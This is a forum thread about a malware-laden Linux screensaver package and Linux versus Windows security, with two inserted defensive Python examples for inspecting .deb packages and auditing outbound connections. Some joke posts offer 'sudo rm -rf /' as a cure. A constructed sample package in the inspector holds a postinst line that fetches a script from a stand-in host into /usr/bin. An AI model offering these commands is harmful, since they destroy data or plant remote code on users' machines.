      For me, Linux is the perfect operating system for a programmer. I'd like it to stay that way. If it becomes popular, that's fine; but if it becomes something other than a programmer's operating system, I will switch to BSD or something.

      --
      Qxe4
    56. Re:Not more safe by mjwx · · Score: 4, Interesting

      Open source or not, you can't fix that unless the whole system is totally locked down like iPhone

      No, even the iPhone has vulnerabilities. Locking down a system does not fix vulnerabilities, it only hides them from public view. An open system is more secure as everyone knows when a vulnerability is discovered and sysadmins can make workarounds (or even pull the system down) until a patch is developed. With a closed system there is less chance of an exploited vulnerability being discovered by the people who want to fix it or are affected by it.

      --
      Calling someone a "hater" only means you can not rationally rebut their argument.
    57. Re:Not more safe by StuartHankins · · Score: 5, Insightful

      Personally I don't care if Linux is ever employed by the "average person". I'm not one of those people and the work I do requires people who know what's going on. Linux gives me the fine control to get in there and tweak things that Windows will probably never have.

      You can make a machine smarter, but people keep getting dumber all the time. At some point you just have to say to those people forget it, you're not going to learn, you're not worth trying to explain it to. Here's your Etch-a-Sketch.

    58. Re:Not more safe by timeOday · · Score: 3, Interesting

      The registry alone makes Windows impossible to clean. Who knows what is in there? It's a bunch of gibberish. Please nobody claim it's the same as /etc, because it isn't. At best the registry is /etc's evil twin.

    59. Re:Not more safe by bendodge · · Score: 2, Informative

      Disclaimer: I'm a tech at a computer repair shop.

      Let me guess: she was running as root. This scareware deleted mbam.exe as soon as the installer unpacked it, and/or had a little icon by the clock that popped a notification balloon every time you started a process saying that it (even taskman) was infected with $SCARY_VIRUS_NAME and killed the process.

      Since the middle of October, we've had a wave of clients with this stuff, many of whom are running the best AVs (we sell NOD32) and have no idea how they got infected.

      Different techs have different favorite ways of removing it, but my personal technique is to create another (limited) user account and start the MBAM installer from there with elevated permissions (using Run As). TADA!

      I don't know why the scareware runs with your account permissions, but it sure makes it easy to defeat.

      --
      The government can't save you.
    60. Re:Not more safe by vadim_t · · Score: 2, Insightful

      Eh? It took far too long for NX to be admitted into the kernel, as if software has no bugs NX does not help.

      Similar functionality was available in grsecurity long before. Most distros don't ship the vanilla kernel anyway.

      Linux does have autorun, it just asks "are you sure". We all know how this is going to end up.

      No, it doesn't. Ubuntu will ask things like "Would you like to see the files on this CD, or download photos from it?", but that's not autorun. What I was referring to is running binaries from newly inserted media. AFAIK no Linux distro does that, even after asking.

      1. Linux market share matters, a lot. But then again I have had over ten virus and antivirus free years and most likely will still have some.

      IMO, antiviruses are a flawed security model and shouldn't be needed in a well secured system. Antiviruses only work against known threats, which means somebody must have got hit by them previously, and the antivirus vendor must have noticed.

      It's much better when the system makes a virus' execution unlikely enough that it doesn't manage to spread.

      2. Not all OSes are same. Capabilities, chroot, jail, zones, virtual machines, sandboxes and managed languages, NX, etc. should be used much more. IE8 is interesting, as are e.g. Chrome and Lobo browsers. This all was started by OpenSSH "privilege separation".
      5. You can protect your machine against stupid users (see second point). Quite well, actually, it is just matter of priorities. But in no OS is security #1.

      That doesn't add up. If there is such a thing as an OS that's better protected, some of them are better and some are worse protected, therefore one of those is #1, or at the very least there are security tiers, where some are definitely worse than others.

      3. Linux is not ahead of virus writers. No OS is.
      6. Getting root is not necessary. Reinstalling Linux takes half an hour, reinstalling all my documents takes eternity (how do I know my backups are not infected).
      7. As long as there is money to be made, viruses will be made. Or power (intelligence agencies).

      You seem to be intent on assuming I'm arguing there's such a thing as 100% effective security. But I'm not. I'm arguing that there's such a thing as better security. Linux can be more secure than Windows, while still being vulnerable to some things.

      Also, IMO, that a virus can be technically written for Linux isn't very relevant. The important thing isn't whether it can be done, it's whether it will spread. If it won't spread it'll never be a credible threat, and will remain an academic exercise.

    61. Re:Not more safe by Zardus · · Score: 2, Interesting

      /etc might not be the same as the Windows registry (I agree with this statement, /etc is much more manageable), but the gconf registry is looking more and more like it every month. You can say gnome isn't an integral part of Linux, but it's installed on the majority of end-users' systems nowadays so for these purposes, it pretty much is...

      --
      You can mod your friends, you can mod your nose, but you can't mod your friend's nose.
    62. Re:Not more safe by ZarathustraDK · · Score: 2, Funny

      Yes, we need a new kind of package that only gives root privileges to packages that do Good Stuff(TM) ^^

      --
      If you quote this signature there'll be 72 copies of Windows ME waiting for you in Heaven.
  2. YES! Finally! by binarylarry · · Score: 5, Funny

    It's the YEAR OF THE LINUX desktop! It's official! /Happy Ubuntu User

    --
    Mod me down, my New Earth Global Warmingist friends!
  3. Removal instructions from the site by Xerp · · Score: 2, Insightful

    "sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552" Man. I'm going to have to get me some anti-malware software...

    1. Re:Removal instructions from the site by wizardforce · · Score: 4, Insightful

      This makes me wonder how long it will be before some warning about a fake virus/trojan/worm succeeds in convincing a few Linux newbies to run some command to get rid of the fake malware which inevitably causes damage or actually downloads actual malware. Something along the lines of: "if you've been infected with virus.deb just run the following command: sudo rm -rf / usr/bin/virus" The only cure is education.

      --
      Sigs are too short to say anything truly profound so read the above post instead.
    2. Re:Removal instructions from the site by selven · · Score: 4, Insightful

      A confusing command line instruction which most people would Ctrl-C and Ctrl-Shift-V into their terminal is actually a pretty good way to get a virus onto a Linux newbie's computer.

    3. Re:Removal instructions from the site by visualight · · Score: 4, Insightful

      Oh, dude. When I'm forced to use a Windows machine my #2 pet peeve is the paste buffer. You don't realize how much middle clicking you do until you don't have it anymore.

      --
      Samsung took back my unlocked bootloader because Google wants me to rent movies. They're both evil.
  4. Re:Of course the ninja was infected... by royallthefourth · · Score: 2, Funny

    He scurries in the darkness because he fears the light that is the Sun Source... Sinanju.

    So Solaris users are unaffected?

  5. auto-update by TheSHAD0W · · Score: 3, Insightful

    Okay, this scares me.

    1. What happens when a publisher includes auto-updating code, but not specific attack code, like the DDoS software in the mentioned examples? If discovered it will appear to be a security risk, but not specifically malicious...

    2. What happens when a software developer produces some completely innocuous software, gets into the repositories - and then months down the road, produces an update with DDoS capability, and has the update pushed into the repositories and automatically distributed?

  6. At least it was fixable. by supersloshy · · Score: 2, Insightful

    Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this. On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware. I am glad to use an OS that doesn't restrict me like that. :)

    --
    "Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
    1. Re:At least it was fixable. by PeanutButterBreath · · Score: 5, Insightful

      Before trolls start yelling about how "OMGZ LINUX ISN'T SECURE HAHAHA" and things like that, let me tell you something: because GNU/Linux is so open and configurable, malware like this can be very easily removed. All you have to do is run a few commands in a terminal to remove this.

      Before trolls start yelling about how "OMGZ WINDOZE AV SOFTWARE IS COMPLICATED HAHAHA" and things like that, let me tell you something: because Windows is so accessible, AV software like this can be very easily deployed. All you have to do is click a few icons in the Start Menu to remove this. Blah, blah, blah

      On Linux and the like, everything is simple if you already know what you want to do. Otherwise, you have to trust unaccountable internet entities to provide you abstruse commands to run and hope they aren't trying to trick you into doing even more damage to your system. It should be obvious why that is no way to combat malware.

    2. Re:At least it was fixable. by imerso · · Score: 2, Insightful

      Although I like Linux as well, I think you are somewhat wrong here. This specific malware is a basic one. Wait for the upcoming Linux malware generations, and try to keep your statement that it'll be easier to get rid of on Linux... I can't see any difference, the malware author could patch your bin executables, wreak havoc on your etc configuration files, and what not, considering the installer was running as admin. Think more about that.

    3. Re:At least it was fixable. by Drakin020 · · Score: 5, Insightful

      Ah but here is the problem.

      To you, removing a virus from Linux is easy, because you are obviously an intelligent Linux user.

      (Someone posted above the removal instructions)

      For you to write out: sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

      seems like nothing at all, but what about the average computer user? Do you think they know what sudo is? Hell I don't use Linux and I have no idea what the shit any of that stuff means. So no, that would only work with someone who really knows what they are doing with Linux.

      Now on the flip side, you say...

      "On Windows and the like, things are so complicated that Anti-virus software is almost required to remove some of their malware"

      Ah, but this is going off the assumption that we are dealing with an average Windows user, not an expert user (Such as your self with Linux)

      An expert Windows user like myself would say "Removing Malware is easy, just go into the registry's run section, remove what looks suspicious, delete temp files, prefetch, and search for the malware running process (Example: virus.exe) in the registry, and delete it"

      Ah see that to me is easy, I've done things like that all the time, and it's just cake.

      So I guess the point I'm trying to make is that...To you, removing a virus like this from Linux can be really simple...to someone who knows Linux, but the same can be said to a Windows user...who knows about Windows.

      --
      The greatest revenge in life is massive success.
    4. Re:At least it was fixable. by philipgar · · Score: 3, Interesting

      ah yes, because linux applications have never had holes allowing someone to get a shell on a system, and users are always running the most up to date kernel that has no root exploits available for it. The main difference between windows and linux is that the linux kernel has so many different versions, and not all distros are using the same one, so that it's hard to choose which kernel vulnerability to exploit. if 99% of people used linux, and were using the same distribution (with mostly the same kernel), believe me, these exploits would exist, and we would see viruses hitting linux machines over the network. Already, there exist worms that have targeted linux machines.

      And saying the problem is not in the kernel but the software applications doesn't cut it either. The same could be said for many of the windows issues, it's just that the software applications in question are in every install and part of the windows user environment. It's no different than applications that might be part of the ubuntu user environment (gnome, samba, etc) etc.

      Phil

    5. Re:At least it was fixable. by DiegoBravo · · Score: 2, Insightful

      This kind of problem is not about Linux or Windows but about a distro that added malware in some crap application. In order to avoid that:

      1) The typical crap software should not be allowed the same privileges as a typical user (why should a screensaver open sockets? remove files?) There are capabilities and several security options that nobody takes seriously

      2) The package system should allow only a predefined set of actions in the installation process. Currently it runs any package's scripts as root; that's the reason I avoid all .deb files as provided by software vendors but obviously the problem is worse if the malware comes from the distribution

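The point above, that dpkg runs a package's maintainer scripts as root, can be checked offline before installing. The following added example (not code from the site, the thread or any project it names) unpacks a .deb in memory and reports the things a screensaver has no business shipping: maintainer scripts that call network tools, files that run at login or boot, and executables in bin directories. The sample package is constructed here, borrowing only the names from the removal command quoted in this thread.

```python
"""Offline triage of a third-party .deb before dpkg runs its scripts as root.
Added example. A .deb is an `ar` archive holding debian-binary, control.tar.*
(metadata plus the maintainer scripts dpkg executes as root) and data.tar.*
(the files it installs). The sample package below is a constructed one."""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
# Commands a theme or screensaver has no reason to run while installing.
NETWORK_TOOLS = re.compile(r"\b(wget|curl|nc|ncat|ftp|scp|ssh)\b")
# A file here means "run code at login or boot", not "draw pictures".
AUTOSTART_PREFIXES = ("etc/profile.d/", "etc/cron", "etc/init.d/",
                      "etc/xdg/autostart/", "etc/rc")
BIN_PREFIXES = ("bin/", "sbin/", "usr/bin/", "usr/sbin/", "usr/local/bin/")


def _ar_members(blob):
    """Yield (name, bytes) for each member of an `ar` archive."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive, so not a .deb")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header at offset %d" % pos)
        name = hdr[0:16].decode("ascii").rstrip().rstrip("/")
        size = int(hdr[48:58])
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members are 2-byte aligned


def _tar_entries(data):
    """Return {normalised path: bytes (files) or None (dirs)} for a tar.*."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            path = m.name.lstrip("./")
            if path:
                out[path] = tf.extractfile(m).read() if m.isfile() else None
    return out


def inspect_deb(blob):
    """Report what the package would do as root, without installing it."""
    control = data = None
    for name, body in _ar_members(blob):
        if name.startswith("control.tar"):
            control = _tar_entries(body)
        elif name.startswith("data.tar"):
            data = _tar_entries(body)
    if control is None or data is None:
        raise ValueError("missing control.tar or data.tar member")
    ctrl = (control.get("control") or b"").decode("utf-8", "replace")
    pkg = re.search(r"^Package:\s*(\S+)", ctrl, re.M)
    report = {"package": pkg.group(1) if pkg else "?",
              "maintainer_scripts": sorted(MAINTAINER_SCRIPTS & set(control)),
              "network_in_scripts": [], "autostart_files": [], "executables": []}
    for script in report["maintainer_scripts"]:
        for line in (control[script] or b"").decode("utf-8", "replace").splitlines():
            if NETWORK_TOOLS.search(line):
                report["network_in_scripts"].append("%s: %s" % (script, line.strip()))
    for path in sorted(data):
        if path.startswith(AUTOSTART_PREFIXES):
            report["autostart_files"].append("/" + path)
        elif path.startswith(BIN_PREFIXES) and data[path] is not None:
            report["executables"].append("/" + path)
    return report


def _tar_bytes(files):
    """Build a gzip'd tar in memory from {path: (mode, bytes)}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, (mode, body) in files.items():
            info = tarfile.TarInfo("./" + path)
            info.size, info.mode = len(body), mode
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def _ar_bytes(members):
    """Build an `ar` archive from an ordered list of (name, bytes)."""
    out = bytearray(b"!<arch>\n")
    for name, body in members:
        out += ("%-16s%-12d%-6d%-6d%-8s%-10d`\n" % (name, 0, 0, 0, "100644", len(body))).encode()
        out += body + (b"\n" if len(body) % 2 else b"")
    return bytes(out)


def build_sample_deb():
    """Constructed sample shaped like the screensaver package in the thread."""
    control = _tar_bytes({
        "control": (0o644, b"Package: app5552\nVersion: 1.0\nArchitecture: all\n"),
        # dpkg runs this as root; a screensaver should not need a postinst at all.
        "postinst": (0o755, b"#!/bin/sh\nwget -q http://example.invalid/run.bash "
                            b"-O /usr/bin/run.bash\nchmod 755 /usr/bin/run.bash\n"),
    })
    data = _tar_bytes({
        "usr/share/backgrounds/waterfall.jpg": (0o644, b"\xff\xd8 jpeg bytes"),
        "usr/bin/Auto.bash": (0o755, b"#!/bin/sh\n/usr/bin/run.bash &\n"),
        "etc/profile.d/gnome.sh": (0o644, b"/usr/bin/Auto.bash\n"),
    })
    return _ar_bytes([("debian-binary", b"2.0\n"),
                      ("control.tar.gz", control), ("data.tar.gz", data)])


if __name__ == "__main__":
    for key, val in inspect_deb(build_sample_deb()).items():
        print("%-20s %s" % (key, val))
```

On a real file, `inspect_deb(open(path, "rb").read())` gives the same report; an empty `maintainer_scripts` list and nothing outside /usr/share is what a theme or screensaver package should look like.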
    6. Re:At least it was fixable. by maugle · · Score: 2, Interesting

      To bolster your point: How did they find the name of the package? Only someone knowledgeable in Linux could've found that out, or the various locations it installed itself to

      To refute your point: Malware can get its hooks into Windows in a variety of different ways, and removal often requires specialized tools. For example, I had to remove one of those hideous fake-antivirus programs from a neighbor's computer. Real antivirus was no help. MalwareBytes Anti-malware couldn't get rid of it. Going into Safe Mode and manually cleaning things out didn't even work. I had to search the Internet and use a specialized tool to finally uproot that crap. (And, while I trusted it, the removal tool could have also been malware, I had no way to tell)

      So: Linux gets infected, smart user can eliminate it. Windows gets infected, smart user still needs to rely on either antivirus or malware-specific removal tools.

    7. Re:At least it was fixable. by FreelanceWizard · · Score: 5, Informative

      I'm afraid not. The reason this malware is easy to remove is because it doesn't do anything truly wretched, like patch libc and other applications, install a rootkit kernel module, and the like.

      Having dealt with Linux boxes that have been hit by automatic exploitation tools that go well out of their way to hide their presence, I can tell you that no matter what the operating system, the standard advice holds: once the machine is infected, the only sure way to get it back to a known state is to restore from a backup made prior to the exploitation or to wipe it completely and start over. I should also point out that these machines were rooted through the exploitation of previously-patched vulnerabilities in setuid services -- which is the exact same vector many Windows worms use, including Slammer and Conficker.

      The only difference between the tools I've run into and a full-on worm is that they run at the command of a cracker and scan IP address ranges of his choice. With a bare amount of automation, they could become very successful Linux worms, breaking into all those machines that, say, have old OpenSSH binaries that haven't been patched against its known remotely exploitable vulnerabilities.

      --
      The Freelance Wizard
    8. Re:At least it was fixable. by armanox · · Score: 2, Informative

      Which is why we have anti-virus and such on Linux as well. A healthy dose of paranoia...

      --
      I'm starting to think GNU is the problem with "GNU/Linux" these days.
  7. Re:Repositories! by binarylarry · · Score: 4, Insightful

    Why? Because it's a sane method of delivering software, which is becoming widely used (i.e. Steam, iTunes Store, etc) vs the traditional "Herpes" model used by Windows?

    --
    Mod me down, my New Earth Global Warmingist friends!
  8. What the summary didn't mention... by AlgorithMan · · Score: 5, Informative

    What the summary didn't mention: the screensaver has been there less than 24 hours.
    see pro-linux.de (German)

    --
    The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
  9. Re:Repositories! by sopssa · · Score: 3, Insightful

    Well do you really want the iPhone like only-approved-software app store for your computer? With no way to download software from anywhere else than that said approved app store.

  10. Patch news... by ghostis · · Score: 2, Funny

    The Gnome team is working with several university neurology departments to develop a patch for human nature that fixes this problem. It will be included in Gnome 4.

    --
    Computer Science is all about trying to find the right wrench to bang in the right screw. -T.Cumbo?
    1. Re:Patch news... by refactored · · Score: 2, Funny

      The Gnome team is working with several university neurology departments to develop a patch for human nature that fixes this problem. It will be included in Gnome 4.

      Don't you mean "Genome 4"?

  11. Re:Repositories! by wizardforce · · Score: 4, Informative

    No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.

    --
    Sigs are too short to say anything truly profound so read the above post instead.
  12. Re:The Elegance of Programming by sexconker · · Score: 3, Funny

    There is an easier (read: more elegant) way to get rid of this Linux malware:

    sudo rm -rf /

    Pussies.
    rm -rf /
    works fine for me!

  13. Spot the anachronism by welshbyte · · Score: 2, Insightful

    Given that screensavers just help to drain your laptop battery, waste energy and have no practical use these days (unless these people have ancient monitors which are susceptible to screen burn) why do people keep using them and why are they still a feature of modern operating system distributions? Monitor and graphics card power saving features should be all that's needed.

    1. Re:Spot the anachronism by the_womble · · Score: 2, Informative

      X-screensavers includes one that is supposed to reverse the LCD equivalent of screen burn. I run it occasionally. It makes the screen flicker, and will probably hospitalise any epileptic who sees it.

  14. Re:Repositories! by slack_justyb · · Score: 2, Interesting

    No but how about a balance between the two. Repos for what most people want. PGP signed debs for the 3rd parties. Straight deb for all those feeling frisky. It's not hard to warn people that, "Hey you're installing an unsigned package, chances are this will ruin your computer, sure you want to do that?" If a third party wants to distribute packages the least they can do is self-sign (bottom end), get a real cert (higher end).

    The inherent problem with the iPhone is that you can only go to one store to buy apps (namely iTunes). With Repos you can pick and choose which stores you trust and which you don't. Much like how I choose if I want to buy software from BigBoxMart or BestStolen. The Internet in general could (since I am using a store analogy apparently) be seen as buying stuff off the street. Yeah, the stuff looks cool and at these bargain prices you can't beat. But I do need to exercise some caution when I flash my wallet to some guy hanging out the back of a van.

    So yes, I agree, I'm not too hip on the one store to rule them all policy. But I do believe that the store concept actually has some utility to offer if given the ability to go to another store should I so choose later. I obviously don't want to exclude the random vendor on the street that is selling hand made crafts, or even the random kiosk by the bus stop selling phones. I do however want to keep in mind the burly looking thug over there selling "Snoby" Radios. I think it is all a matter of getting people to get inside a way of thinking.

    To me, and that only applies to me, Mac OSX screams "Hey buy more shiny Apple stuff" (Security by insulating ones self by coolness). Linux says to me "Hey subscribe to a Repo because we are always changing stuff and you want to have the latest build." (Security by trust of subscription [or maybe sheer geekness]). Windows just looks like, "Hey we're cool with everyone, you want herpes? No problem we're cool with that. Want to do really neat spreadsheets? We're cool with that too." (Insecurity by being a software whore. We're just trying to please everyone.)

  15. "cleansing your system" by Lost+Race · · Score: 2, Insightful

    For those affected, both sites also provide instruction on cleansing your system.

    There's only one way to "cleanse" your system of malware once it's infected:

    1. Boot from known-good media (i.e. pressed CD from OS distributor)
    2. Block-erase hard drive(s)
    3. Re-install OS
    4. Restore documents from backup

    Any malware that can auto-update itself can potentially install anything at all. It could, for example, set up a file-sharing node which caches illegal data files on your system.

    1. Re:"cleansing your system" by istartedi · · Score: 2, Insightful

      You forgot to verify the BIOS checksum.

      Although most malware probably doesn't go that far, it seems like if I really wanted to "pwn yur box", I'd at least patch rm to not delete my executable and instead simply fool the user into thinking it was gone. Patch ps to not display the process.... and general other rootkit mischief. I'm not terribly familiar with that kind of thing, but I assume there are people who have made it their life's work to hide executables on Linux, whereas I KNOW there are people who've made it their life's work on Windows.

      The only real solution, IMHO, is to drop-kick the computer out the door and use parchment and a quill pen for all your correspondence. Let's see 'em hack the Amish.

      --
      For all intensive purposes, "whom" is no longer a word. That begs the question, "who cares"?
  16. Security is like sex by argent · · Score: 3, Funny

    Security is like sex. Once you're penetrated you're ****ed.

    When you install software, you're having unsafe sex.

    Don't do it lightly.

  17. Interesting... by jonaskoelker · · Score: 2, Funny

    Gnome team is working [...]] to develop a patch for human nature that fixes this problem.

    I suspect they've decided that a free will is unusable and will replace it with sane defaults ;)

  18. Good News by savvyart · · Score: 2, Funny

    Finally, the year of Linux desktop is coming. Even malware authors are taking notice and creating trojans and sneakware, so indeed linux adoption is up, yay!

  19. Linux needs a "Zone Alarm" like program by TractorBarry · · Score: 2, Insightful

    > keep itself updated via downloads

    I keep boring people with this point and I'm going to keep doing so until the Linux peeps get it. Linux needs a program that performs the same function as Zone Alarm. In other words no program on a desktop system should be allowed to connect to the internet before the user has okayed it.

    One of the first things I do when a non technical friend asks me to help with their Windows PC is to install Zone Alarm simply because it will prompt you before a program can connect to the network or internet. I then explain that if they don't know what a program is, or why it's trying to connect to the internet, don't let it. You can always change your mind later and you can always google it, or ask me, to find out what the program is and what it does.

    This has stopped numerous malware infestations from getting serious (i.e. downloading their real payload). I believe there's very little real malware nowadays that doesn't require 'net access to do its work (reporting personal information such as credit card details, being a node in a botnet etc.) so having a gatekeeper between programs and the network should be a primary design consideration of all desktop systems.

    Without this functionality it's just a matter of time before the first serious auto updating Linux virus problem occurs. It might well be harder to get a root infestation on a Linux box but does this matter? A userland program can steal information, participate in a botnet etc. quite adequately for most purposes. If it's well written and consumes little in the way of resources a user probably wouldn't even notice either.

    On Windows Zone Alarm acts like a nightclub bouncer for 'net access. Meanwhile on Linux any old program gets full internet access without the user knowing a thing.

    --
    Sky subscribers are morons. They pay to be advertised at !
    1. Re:Linux needs a "Zone Alarm" like program by Bent+Mind · · Score: 2, Informative

      Linux needs a program that performs the same function as Zone Alarm

      It is called Netfilter and it is built into the kernel. For low-level configuration, take a look at the iptables command. Several hundred programs offer "simpler" configuration tools, from command line to GUI. Take a look at the L7-filter for application layer packet classification.

      --
      Request a Linux Shockwave player here: http://www.macromedia.com/support/email/wishform/
    2. Re:Linux needs a "Zone Alarm" like program by oojah · · Score: 2, Interesting

      I suspect the GP is talking about the interactive features of Zone Alarm. My understanding is that it only allows outgoing network traffic from known executables that the user has allowed. If an executable hasn't requested network access before, or if an executable that previously asked for access and was granted it but has now been modified (an upgrade/overwritten by malware/...) then Zone Alarm will ask the user again if network access should be granted. It also notes that the executable has previously asked for access and that the file has changed since the last access. L7 filtering is a good start, but it's the user interaction at the time of network access that makes Zone Alarm really useful.

      --
      Do you have any better hostages?
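The behaviour oojah describes (decisions keyed on the executable, re-prompting when the binary on disk changes) and the Linux building blocks Bent Mind points at can be put together in a small audit. The following is an added example, not code from the thread or from Zone Alarm, Netfilter or L7-filter: it maps established sockets in /proc/net/tcp to their owning executables and applies a path-plus-hash allow-list. The /proc text and the inode-to-executable table are constructed samples (a live tool would read /proc/net/tcp, /proc/<pid>/fd and /proc/<pid>/exe itself), and unlike an interactive prompt this runs after the socket exists; a pre-connection prompt needs the kernel's help, for example Netfilter's NFQUEUE target.

```python
"""Per-executable egress audit in the style the thread ascribes to Zone Alarm.
Added example. Linux ties a socket to a process only indirectly: /proc/net/tcp
lists each socket's inode, /proc/<pid>/fd/* links to "socket:[inode]" and
/proc/<pid>/exe names the binary. Decisions are keyed on the executable's path
and a SHA-256 of its bytes, so a binary that changes must be approved again."""
import hashlib
import socket
import struct

ESTABLISHED = "01"  # value of the 'st' column in /proc/net/tcp for TCP_ESTABLISHED


def parse_proc_net_tcp(text):
    """Return [(remote_ip, remote_port, inode)] for established IPv4 sockets."""
    conns = []
    for line in text.splitlines()[1:]:  # first line is the column header
        f = line.split()
        if len(f) < 10 or f[3] != ESTABLISHED:
            continue
        rem_hex, port_hex = f[2].split(":")
        # Addresses are hex in host byte order; decoded as little-endian (x86).
        ip = socket.inet_ntoa(struct.pack("<I", int(rem_hex, 16)))
        conns.append((ip, int(port_hex, 16), int(f[9])))
    return conns


class EgressPolicy:
    """Allow-list keyed on executable path, bound to the file's SHA-256."""

    def __init__(self):
        self._rules = {}  # path -> (sha256 hex, "allow" or "deny")

    def decide(self, exe_path, exe_bytes):
        digest = hashlib.sha256(exe_bytes).hexdigest()
        rule = self._rules.get(exe_path)
        if rule is None:
            return "ask"          # never seen this binary: prompt the user
        if rule[0] != digest:
            return "ask-changed"  # same path, different contents: prompt again
        return rule[1]

    def remember(self, exe_path, exe_bytes, verdict):
        self._rules[exe_path] = (hashlib.sha256(exe_bytes).hexdigest(), verdict)


def audit(proc_net_tcp, inode_to_exe, policy):
    """Map live connections to executables and apply the policy to each."""
    findings = []
    for ip, port, inode in parse_proc_net_tcp(proc_net_tcp):
        exe_path, exe_bytes = inode_to_exe.get(inode, ("<unknown>", b""))
        findings.append((exe_path, ip, port, policy.decide(exe_path, exe_bytes)))
    return findings


# Constructed /proc/net/tcp excerpt: one listener, two established connections.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:C1A4 0A0200C0:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 22222 1 0000000000000000 20 4 30 10 -1
   2: 0F02000A:C1B0 076433C6:1F90 01 00000000:00000000 00:00000000 00000000  1000        0 33333 1 0000000000000000 20 4 30 10 -1
"""

# Constructed inode -> (exe path, exe bytes) table, standing in for what
# /proc/<pid>/fd and /proc/<pid>/exe would yield on a live system.
FIREFOX_V1 = b"ELF firefox build 1 (constructed)"
FIREFOX_V2 = b"ELF firefox build 2 (constructed)"
SAMPLE_INODE_TABLE = {
    22222: ("/usr/bin/firefox", FIREFOX_V1),
    33333: ("/usr/bin/run.bash", b"#!/bin/sh\n# constructed updater stub\n"),
}


def demo():
    """Approve firefox once, then audit before and after its binary changes."""
    policy = EgressPolicy()
    policy.remember("/usr/bin/firefox", FIREFOX_V1, "allow")
    before = audit(SAMPLE_PROC_NET_TCP, SAMPLE_INODE_TABLE, policy)
    changed = dict(SAMPLE_INODE_TABLE)
    changed[22222] = ("/usr/bin/firefox", FIREFOX_V2)  # e.g. an upgrade or overwrite
    after = audit(SAMPLE_PROC_NET_TCP, changed, policy)
    return before, after


if __name__ == "__main__":
    for label, findings in zip(("before", "after"), demo()):
        print(label, findings)
```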